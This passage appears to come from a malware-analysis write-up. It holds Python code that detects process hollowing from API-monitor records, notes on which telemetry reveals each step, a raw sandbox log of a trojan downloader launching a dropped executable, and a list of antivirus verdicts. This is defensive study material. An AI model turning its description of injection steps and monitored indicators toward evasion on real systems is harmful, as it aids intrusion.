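        elif t is None:
            continue
        elif api == "NtAllocateVirtualMemory" and "PAGE_EXECUTE_READWRITE" in args.get("protection", ""):
            base = int(args["base_address"], 16)
            t["rwx"].append((base, base + int(args["region_size"])))
        elif api == "WriteProcessMemory":
            addr = int(args["base_address"], 16)
            t["writes"].add(addr)
            if args.get("buffer", "").startswith("MZ"):
                t["pe_base"] = addr
        elif api == "NtSetContextThread":
            # Assumed x86 convention for a new process's first thread: EAX = entry point, EBX = PEB address.
            # The monitor prints registers as signed decimals, hence the 32-bit mask.
            t["entry"] = int(args.get("registers.eax", "0")) & 0xFFFFFFFF
            t["peb"] = int(args.get("registers.ebx", "0")) & 0xFFFFFFFF
        elif api == "NtResumeThread" and t["pe_base"] is not None and "entry" in t:
            findings.append({"pid": pid, "image": t["image"], "pe_base": t["pe_base"], "entry": t["entry"],
                             "entry_in_rwx": any(lo <= t["entry"] < hi for lo, hi in t["rwx"]),
                             "peb_imagebase_patched": (t["peb"] + 8) in t["writes"]})  # ImageBaseAddress = PEB+8 (x86)
    return findings
```

On a live host the two predicates come from different sources: the exclusion shows up in process-creation telemetry (Sysmon event 1 carries the command line) and in the Defender operational log as event 5007 (configuration changed), while the write-to-suspended-child chain is only visible to an API-hooking monitor like the one that produced this report or to kernel/ETW tooling. The correlation key the detector relies on, the child pid shared by the allocation, the writes, the context change and the resume, is what such tooling has to preserve.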

NtResumeThread

thread_handle: 0x00000298
suspend_count: 1
process_identifier: 2448
1 0 0

NtResumeThread

thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2448
1 0 0

NtResumeThread

thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2448
1 0 0

NtResumeThread

thread_handle: 0x000004a8
suspend_count: 1
process_identifier: 2448
1 0 0

CreateProcessInternalW

thread_identifier: 2264
thread_handle: 0x00000084
process_identifier: 584
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\timeout.exe
track: 1
command_line: timeout 1
filepath_r: C:\Windows\system32\timeout.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x000000ec
suspend_count: 1
process_identifier: 3028
1 0 0

CreateProcessInternalW

thread_identifier: 808
thread_handle: 0x00000270
process_identifier: 1568
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000278
1 1 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 1568
1 0 0

NtResumeThread

thread_handle: 0x00000158
suspend_count: 1
process_identifier: 1568
1 0 0

NtResumeThread

thread_handle: 0x0000019c
suspend_count: 1
process_identifier: 1568
1 0 0

NtResumeThread

thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
ALYac Trojan.GenericKD.36977766
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 004c77211 )
Alibaba TrojanDownloader:MSIL/Kryptik.91664c5d
K7GW Trojan ( 004c77211 )
Cybereason malicious.69416f
Cyren W32/MSIL_Kryptik.ECN.gen!Eldorado
Symantec Trojan Horse
ESET-NOD32 a variant of MSIL/Kryptik.CQR
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Downloader.MSIL.Deyma.gen
BitDefender Trojan.GenericKD.36977766
BitDefenderTheta Gen:NN.ZemsilF.34692.Np2@aSR7DRmi
MicroWorld-eScan Trojan.GenericKD.36977766
Avast Win32:MalwareX-gen [Trj]
Ad-Aware Trojan.GenericKD.36977766
Emsisoft Trojan.Crypt (A)
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R023C0WET21
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.mg.b1d319888860b7a6
Sophos Mal/Generic-S
Ikarus Trojan.MSIL.Crypt
Avira TR/Kryptik.dfdyr
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Kryptik.oa
Arcabit Trojan.Generic.D2343C66
AegisLab Trojan.MSIL.Deyma.a!c
ZoneAlarm HEUR:Trojan-Downloader.MSIL.Deyma.gen
GData Trojan.GenericKD.36977766
AhnLab-V3 Trojan/Win.Generic.C4498305
McAfee Artemis!B1D319888860
MAX malware (ai score=99)
Malwarebytes Trojan.MalPack.MSIL
TrendMicro-HouseCall TROJ_GEN.R023C0WET21
Rising Downloader.Deyma!8.1093B (CLOUD)
Yandex Trojan.Kryptik!7j+BP6dkVV4
SentinelOne Static AI - Malicious PE
Fortinet MSIL/Agent.AES!tr
AVG Win32:MalwareX-gen [Trj]
Panda Trj/CI.A
CrowdStrike win/malicious_confidence_90% (W)